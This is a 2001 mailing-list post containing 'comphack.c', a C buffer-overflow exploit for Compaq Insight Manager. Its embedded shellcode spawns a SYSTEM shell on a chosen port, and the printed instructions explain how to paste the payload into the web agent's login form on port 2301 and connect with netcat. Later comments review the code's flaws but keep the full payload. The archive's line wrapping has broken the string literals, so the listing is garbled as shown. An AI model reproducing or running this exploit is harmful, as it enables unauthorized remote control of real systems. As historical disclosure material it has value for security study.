comphack - Compaq Insight Manager Remote SYSTEM shell
From: Indigo <indig0 () talk21 com>
Date: 29 Nov 2001 11:54:47 -0000
Mailer: SecurityFocus
I'm running out of Win32 vulnerabilities to exploit
here...Anyone got any ideas?
Cheers,
Indigo.
/* comphack.c - Compaq Insight Manager
overflow exploit by Indigo <indig0 () talk21 com> 2001
Usage: comphack <victim port>
This code has been compiled and tested
on Linux and Win32
The shellcode spawns a SYSTEM shell on
the chosen port
Main shellcode adapted from code written
by izan () deepzone org
Greets to:
Morphsta, Br00t, Macavity, Jacob &
Monkfish...Not forgetting D-Niderlunds
*/
/* #include <windows.h> uncomment if compiling on
Win32 */
#include <stdio.h>
/*
 * Entry point. Builds the published payload in a local buffer, patches the
 * listener port given on argv[1] into it at two fixed offsets, and writes the
 * buffer to ./exploit.bin for manual delivery through the web form described
 * in the printed instructions. Historical (2001) proof-of-concept listing: the
 * long string literal and the printf() arguments have been line-wrapped by the
 * mail archive, so the text is kept as published and is not buildable as shown.
 *
 * Defender context (from the printed instructions only): the affected input is
 * the 'Name' field of the Insight Manager web agent reached on port 2301; the
 * program itself only writes a local file and opens no network connection.
 *
 * Returns 0; also exits with status 0 on a usage error.
 */
int main(int argc, char **argv)
{
/* Payload buffer. The leading run of 0x61 ('a') bytes is filler ahead of the
 * payload proper; the remaining bytes are reproduced as published and are
 * deliberately not annotated here. */
unsigned char shellcode[] =
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61
\x61\x61\x61\x61"
/* The 0x61 filler run ends partway through the next line; the published
 * payload bytes follow from there. */
"\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77
\xFF\xE1\x03\x10"
"\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7
\x31\xC9\xB1\x6F"
"\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07
\x31\xDB\xB3\x18"
"\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3
\x1D\x01\xDF\x29\x07"
"\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07
\xB3\x05\x01\xDF"
"\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07
\xB3\x12\x01\xDF"
"\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01
\xDF\x29\x07\xB3\x14"
"\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3
\x3F\x01\xDF\x29\x07"
"\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07
\xB3\x08\x01\xDF"
"\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01
\xDF\x29\x07\x66\x81"
"\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07
\x47\x47\x47\x47"
"\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7
\x5F\x5F\x5F\x5F"
"\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2
\xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5"
"\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7
\xAD\x5D\x5F\x5F\xD2"
"\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35
\x55\xCF\xCF\xCF"
"\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6
\x7A\x1F\x5F\x09"
"\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6
\x7A\x1F\x5F\x09\xA0\xCA"
"\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6
\x7A\x1F\x5F\x09\xD2\xEA\xB2"
"\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0
\xCA\x6C\x7A\x1F"
"\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2
\xEA\xAA\x7A\x1F"
"\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79
\x1F\x5F\xF2\x0F"
"\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79
\x1F\x5F\xF2\x0F\xA0\xCA"
"\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2
\xE2\x72\x79\x1F\x5F"
"\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2
\x6E\x79\x1F\x5F\xF4\xD2"
"\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79
\x1F\x5F\x5F\x5F\x5F\x5F"
"\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2
\xEA\x66\x79\x1F\x5F"
"\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35
\x5F\x35\x4F\x35\x5E"
"\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35
\x5F\xA0\xCA\x64"
"\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37
\x5F\x5D\x5F\x5F\xA0\xCA"
"\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79
\x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F"
"\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35
\x5C\x0C\xA0\xCA\x5D\x7A"
"\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6
\x7A\x1F\x5F\x09"
"\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79
\x1F\x5F\xF4\x6C\xBF"
"\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0
\xCA\x10\x7A\x1F"
"\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2
\x3A\x79\x1F\x5F\x08"
"\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0
\xCA\x60\x7A\x1F"
"\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2
\x3A\x79\x1F\x5F\x5D"
"\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79
\x1F\x5F\x5E\x7F\x5F\x5F"
"\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79
\x1F\x5F\x5F\x7F\x5F\x5F"
"\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79
\x1F\x5F\x08\x0F"
"\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6
\x7A\x1F\x5F\xF2\x0F\xA0"
"\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10
\x7A\x1F\x5F\xD4\xDA\x3A"
"\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79
\x1F\x5F\xF2\x0F\xD2\xEA"
"\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55
\x7A\x1F\x5F\x35\x5F\xD2\xE2"
"\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2
\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0
\xCA\x10\x7A\x1F"
"\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38
\xA0\xA0\xA0\x35"
"\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79
\x1F\x5F\xF2\x0F\xD2"
"\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51
\x7A\x1F\x5F\xD6\xDA\x3E"
"\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08
\x0F\xD2\xEA\x0E"
"\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2
\x0F\xA0\xCA\x14"
"\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35
\x5F\xD4\xDA\x3E"
"\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4
\xDA\x0E\x79\x1F"
"\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0
\xCA\x18\x7A\x1F\x5F"
"\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0
\xA0\xD2\xEA\x06"
"\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2
\xEA\x02\x79\x1F"
"\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0
\xCA\x08\x7A\x1F"
"\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0
\x4D\x0F\x04\x06\x08"
"\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0
\x4D\x0F\xF3\xDB"
"\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10
\x1C\x14\x6C\x6D"
"\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31
\x3B\x5F\x33\x36\x2C"
"\x2B\x3A\x31
\x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31
\x3B\x5F"
"\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30
\x3C\x34\x3A\x2B"
"\x5F\x14\x1A\x2D\x11\x1A\x13
\x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A"
"\x0F\x36\x2F\x3A\x5F\x18
\x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16"
"\x31\x39\x30
\x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30
\x3C\x3A"
"\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32
\x3A\x3B\x0F\x36\x2F"
"\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30
\x3C\x5F\x2D\x3A"
"\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36
\x2B\x3A\x19\x36\x33\x3A"
"\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30
\x2C\x3A\x17\x3E\x31\x3B"
"\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30
\x3C\x3A\x2C\x2C\x5F\x1C"
"\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31
\x7F\x63\x36\x25"
"\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71
\x30\x2D\x38\x61"
"\x5D\x5F\x40\x17
\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
"\x53
\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x
5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
"\x1C\x12\x1B\x71\x1A\x07
\x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\
x5F\x5F\x5F\x5F"
/* The explicit trailing 0x00 is the byte at which fputs() below stops
 * writing; the array also carries the literal's implicit terminator. */
"\x56\x56\x56\x56\x56\x00";
FILE *fp;                    /* handle for ./exploit.bin */
unsigned short int a_port;   /* port from argv[1], byte-swapped and masked below */
/* Banner and manual delivery steps, printed as published (the argument
 * strings are line-wrapped by the archive). Note the banner is printed
 * before the argument count is checked. */
printf ("\nCompaq Insight Manager overflow
launcher\nby Indigo <indig0 () talk21 com> 2001\n\n");
printf ("This program will generate a binary file called
exploit.bin\n");
printf ("Connect to the victim using a web browser
http://victim:2301\n");
printf ("Next to \'Login Account\', click on
\'anonymous\'\n");
printf ("Enter some random characters into the
\'password\' field\n");
printf ("Open exploit.bin in notepad, highlight it then
copy to the clipboard\n");
printf ("Paste the exploit into the \'Name\' field and
click OK\n");
printf ("\nLaunch netcat: nc <victim host> <victim
port>\n");
printf ("\nThe exploit spawns a SYSTEM shell on the
chosen port\n\n");
if (argc != 2)
{
printf ("Usage: %s <victim port>\n", argv[0]);
exit (0);   /* usage error still exits with status 0 */
}
/* atoi() gives no error indication, so a non-numeric argument silently
 * becomes port 0. htons() is used with no socket header visible in this
 * listing (<windows.h> is commented out); it is assumed to come from the
 * build environment. The XOR with 0x5f5f masks the two port bytes before
 * they are stored; presumably the payload undoes that mask at run time --
 * not verifiable from the bytes here. */
a_port = htons(atoi(argv[1]));
a_port^= 0x5f5f;
/* Hard-coded patch offsets: assumes the literal above is at least 1652
 * bytes long -- not counted in this review. */
shellcode[1650]= (a_port) & 0xff;
shellcode[1651]= (a_port >> 8) & 0xff;
/* fopen() failure (e.g. unwritable cwd) is not checked; a NULL fp would be
 * passed straight to fputs(). fputs() treats the unsigned char array as a
 * C string, so the write ends at the first 0x00 byte, and the write itself
 * is likewise unchecked. */
fp = fopen ("./exploit.bin","wb");
fputs (shellcode,fp);
fclose (fp);
return 0;
}
